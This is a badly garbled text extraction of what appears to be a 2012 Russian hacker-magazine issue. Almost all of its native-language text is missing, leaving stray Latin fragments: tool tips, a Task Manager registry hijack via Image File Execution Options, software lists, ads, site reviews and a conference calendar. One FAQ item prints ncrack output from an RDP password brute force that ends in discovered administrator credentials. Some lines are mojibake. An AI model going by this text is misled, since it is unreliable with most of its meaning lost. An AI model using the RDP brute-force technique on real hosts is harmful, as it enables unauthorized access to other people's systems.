fakedns.py (bit.ly/vhgamQ).
DNS Python ( 40 )
. IP ,
fakedns.py,
.
HostsMan (bit.ly/uZAV0X).
DNS-,
hosts. , ,
. , , 99%
. :)
137
Process Explorer
(bit.ly/ugFDpx) Replace
Task Manager,
. ,
:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Image File
Execution Options\taskmgr.exe
taskmgr.exe
, . Debugger (,
c:\utils\Process Explorer\procexp.exe).
,
-
WEBSOCKET?
. ,
:
1. ,
, Wireshark (www.wireshark.org).
,
WebSockets,
,
HTTP (, SOAP).
2. Firefox
Temper Data (bit.ly/sM49Hk),
,
.
N . ,
.
: Low, Media
High. , -
,
Medium (
). ,
. Process
Explorer
(View Select
Columns Integrity Level).
? ,
- ,
usermode.
, , ,
KeePass ,
,
.
. - ,
KeePass
.
KeyPass
High, . !
-
( KeyPass)
Run as administrator. , ,
,
.
, .
Windows Integrity Levels .
icacls,
Chml (bit.ly/s0BLCm). ,
( "-i:h") ( "-nr"):
192.168.26.137:3389,CL=2
rdp://192.168.26.137:3389 (EID 1) Login
failed: 'administrator' 'admin'
...
Discovered credentials on
rdp://192.168.26.137:3389 'administrator' 'admin123'
!
.
NETSETMAN (WWW.NETSETMAN.COM)?
netsh
dump:
netsh interface dump > netsh-config1.txt
:
# ---------------------------------# Interface IP Configuration
# ---------------------------------pushd interface ip
# Interface IP Configuration for "Local
Area Connection 1"
set address name="Local Area Connection
1" source=dhcp
set dns name="Local Area Connection 1"
source=dhcp register=PRIMARY
set wins name="Local Area Connection 1"
source=dhcp
popd
# End of interface IP configuration
...
, netsh -f:
Q WINDOWS
INTEGRITY LEVELS?
?
Windows Vista, 7
A Server 2008,
, mandatory integrity levels (MIL).
,
Microsoft
, ,
-
, .
.
,
N
138
, file.zip
Access is denied.
,
,
, ,
. z
RDP?
,
RDP-, TSGrinder (bit.ly/uThpnS).
.
ncrack (nmap.org/ncrack)
nmap ,
RDP. :
FakeDNS DNS-..
01 /156/ 2012
>System
AutoHideDesktopIcons 1.41
Device Remover 0.9
DTaskManager 1.51
Free File Unlocker 1.0
GPU-Z 0.5.6
HD Tune Pro 5.0
HDClone 4.0.7
JaBack 9.12
Nimi Visuals
OCCT Perestroika 4.0.0
Real Temp 3.60
Smart Defrag 2.2
Svchost Process Analyzer
System Explorer 3.6.2
WhoCrashed 3.02
X Mouse Button Control 2.0
>>UNIX
>Desktop
Cheese 3.2.2
Clementine 0.7.1
Coolreader 3.0.43
Dvdisaster 0.72.3
Freecad 0.11.4422
Gnuplot 4.4.4
Handbrake 0.9.5
Imageagick 6.7.3-8
K9copy 2.3.7
>Net
Angry IP Scanner 3.0 Beta 6
ClipGrab 3.1.3.1
Freeproxy 4.10
IncrediMail 2.5
Koma-Mail 3.82
LiteManager 4.4.1
NetMeter 1.1.4
NetWorx 5.2.1
Pokki
RadioClicker 8.11
>Security
Ariadne
BeEF 0.4.2.11
Buster Sandbox Analyzer 1.44
CIAT 1.02
ClamAV 0.97.3
DirBuster 0.12
Emulation Framework 1.0.0
File Disclosure Browser
GenXE 0.9.0
Hades
John the Ripper 1.7.9
MagicTree 1.0
MeMMoN
NetworkMiner 1.1
NetworkMiner 1.2
NMapSi4 0.3 beta
PEiD Plugins
Rec Studio 4
thc-ssl-dos 1.4
USB Cop 1.0
VanishCrypt
VirtualKD 2.6
w3af 1.1
Windbgshark 0.0.1
Window Maximizer v2.00
Windows-privesc-check
WPScan 1.1
X-Scan 3.3
>Multimedia
All Free ISO Burner
Avidemux 2.5.5
AVS Media Player 4.1.8.93
ExifTool 8.71
Free Audio Converter 5.0.2
Free Screen Video Recorder
2.5.19
Jimp 2.0.0
KMPlayer 3.0.0.1442
ManyCam 2.6.60
Photoscape 3.5
Sonarca Sound Recorder 3.7.8
Songbird 1.10.1
STDU Viewer 1.6.62
Sysygy Image Viewer 1.3
Ubuntu Skin Pack 8.0
WindowTabs
>Misc
7stacks 1.5
Droid Explorer 0.8.8.2
EssentialPIM 4.5
FavBackup 2.1.1
Fences 1.01
FileMenu Tools 6.0.1
FreeCommander 2009.02b
PointerStick 1.21
Q-Dir 4.87
Rainmeter 2.1
RocketDock 1.35
SumatraPDF 1.9
UboroBot 2.0
ViewFD 2.3.0
Volumouse 1.72
WinSplit Revolution 11.04
>>WINDOWS
>Development
AjaxControlToolkit 4.1.51116
DEV-C++ 4.9.9.2
Dia 0.97.1
Facebook C# SDK 5.3.2
HAP 1.4.0
HeidiSQL 6.0
HiAsm 4.4
Json.NET 4.0
Mocha 0.0.8
PHPExcel 1.7.6
PTVS 1.1
PyScripter 2.4.3
SDL 1.2.14
StyleCop 4.6
TReplacer 2.11
Utilu IE Collection 1.7.2.0
>Security
Blueproximity 1.2.5
Chatsniff 1.0
Clamtk 4.36
Emulation Framework 1.0.0
Fwbuilder 5.0.0.3568
Gadmin-openvpn-server 0.1.5
GenXE 0.9.0
GoLISMERO
Gsasl 1.6.1
HOPPER
Ipclassify 1.1
>Net
Aweather 0.6
Chrome 15
Dada_mail 4.8.4
Evolution 3.2.2
Firefox 8.0.1
Getleft 1.2
Instantbird 1.1
Knemo 0.7.2
Ktorrent 4.1.3
Lftp 4.3.3
Liferea 1.6.6b
Linphone 3.4.3
Linuxdcpp 1.1.0
Smuxi 0.8
Stealthnet 0.8.7.9
Swift 1.0
Tvdownloader 0.7.2
Watchvideo 2.2.1
>Games
Flightgear 2.4.0
Netrek 3.3.0
>Devel
Apache_tika 1.0
Dlib 17.44
Freebasic 0.23.0
Geany 0.21
Groovy 1.8.4
Gtk 3.3.4
Javatools 0.44
Jvcl 3.45
Libglass 2.0.0
Libmicrohttpd 0.9.17
Maveryx 1.3.0
Nant 0.91
Open64 5.0
Padre 0.92
Pypy 1.7
Quexml 1.3.7
Raptor2 2.0.5
Ruby 1.9.3-p0
Valgrind 3.7.0
Libreoffice 3.4.4
Metamorphose 1.1.2
Nip2 7.26.3
Optipng 0.6.5
Pyroom 0.4.1
Tomboy 1.9.3
Wavesurfer 1.8.8p3
Xine 1.1.20
Xorriso 1.1.8
>>MAC
Amaya 11.3.1
AppHack 1.1
Aptana Studio 3.0
Art of Illusion 2.9
Boxer 1.2
Clementine Music Player 0.7.1
DeTune 1.0.6
DVDTheque 3.1.2
GitHub 1.1
GV Connect Widget 2.1.1
JollysFastVNC 1.32
Magican 0.9.63
Mou 0.7.0
RaidEye 2.0
SourceTree 1.2.9
Tincta 1.3.1
Veusz 1.14
VMware Fusion 4.1.1
Winamp 0.7.1
>X-distr
openSUSE 12.1
>System
Apt-dater 0.8.6
Css 20111030
Di 4.31
Freeipa 2.1.3
Glpi 0.80.5
Grep 2.10
Libertine 5.1.3-2
Linux 3.1.3
Pbis 6.1.0.8729
Pf-kernel 3.1.3
Synctool 5.1
Virtualbox 4.1.6
Webmin 1.570
Winetricks 20111115
Zabbix 1.8.9
>Server
Apache 2.2.21
Asterisk 1.6.2.20
Bind 9.8.1-p1
Cups 1.5.0
Dhcp 4.2.3
Dovecot 2.0.16
Freeradius 2.1.12
Lighttpd 1.4.29
Mysql 5.5.18
Nsd 3.2.9
Openldap 2.4.27
Openvpn 2.2.1
Postfix 2.8.7
Postgresql 9.1.1
01(156) 2012
9.-
0(/.%'!0
km`gj{lzd
nogjmedlg~
l_(4-,
lmazd`_bg
s_hjmazt
srliugh0(0
8889",&136
"/%30*%
&/$3:15*0/
9.-
i_irbl_q{
vremh`mqldq
odimkdlcma_ll_~
,OTUS$OMINO#ONTROLLER
!
800
!
191
2200 . ( )
23% ,
(250 )
30 ,
31 ,
31 .
8.5
DVD
!
!
,
, :
+ DVD
Total Football
+ DVD
DVD
+ DVD
DVDXpert
+ DVD
Smoke
,
.
PC
+ 2 DVD
+ DVD
T3
Digital Photo
+ DVD
+ DVD
12 2200 .
6 1260 .
,
!
.
: 210
x 09 (152) 2011
LULZSEC
09 (152) 2011
082
1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
500 .
WINDOWS 7
PHPMYADMIN
064
ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS
+ + 2 DVD:
162
( 35% , )
!
,
.
12 3890 (24 )
6 2205 (12 )
.
,
UNITS / WWW2
WWW2
ROUTERPWN
www.routerpwn.com
, . , mac_find (
MAC-) phenoelit (
).
, . ,
, ,
IP- . ,
:).
C
KICKSEND
kicksend.com
,
Rapidshare , . -
, e-mail . , ,
, , :
e-mail 500 ? , , 1 . .
PROXPN
proxpn.com
, proXPN, one-click-
VPN- . ,
OpenVPN, , , . ,
proXPN . , . ,
. (, WiFi-),
.
VPN-
JPC 2
jpc2.com
,
.
Javascript PC Emulator (bellard.org/jslinux),
( JavaScript), Linux. JPC 2 , , Java : Windows XP Ubuntu .
jpc2.com, .
, .
Windows XP Ubuntu
142
01 /156/ 2012
: . : .
143
UNITS / 2012
NY2K+12
. MUST SEE
MUST VISIT ,
.
- , .
: .
,
.
20-23
14-16
30-31
2012
HITB
BLACKHAT
PHDAYS
CONFIDENCE
conference.hitb.org
www.blackhat.com
www.phdays.ru
confidence.org.pl
, ,
,
,
,
,
.
. , ,
.
PHDAYS
.
,
. ,
CTF-.
:
, ,
.
,
:).
26-29
25-26
2012
DEFCON
CC'2012
ZERONIGHTS
www.defcon.org
cc.org.ru
www.zeronights.ru
DEFCON
RUSSIA
, 20-
-.
,
:
!
demoscene-.
.
.
,
: ,
.
!
www.defcon-russia.ru
144
2011 5
.
IT/-,
. !
01 /156/ 2012
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU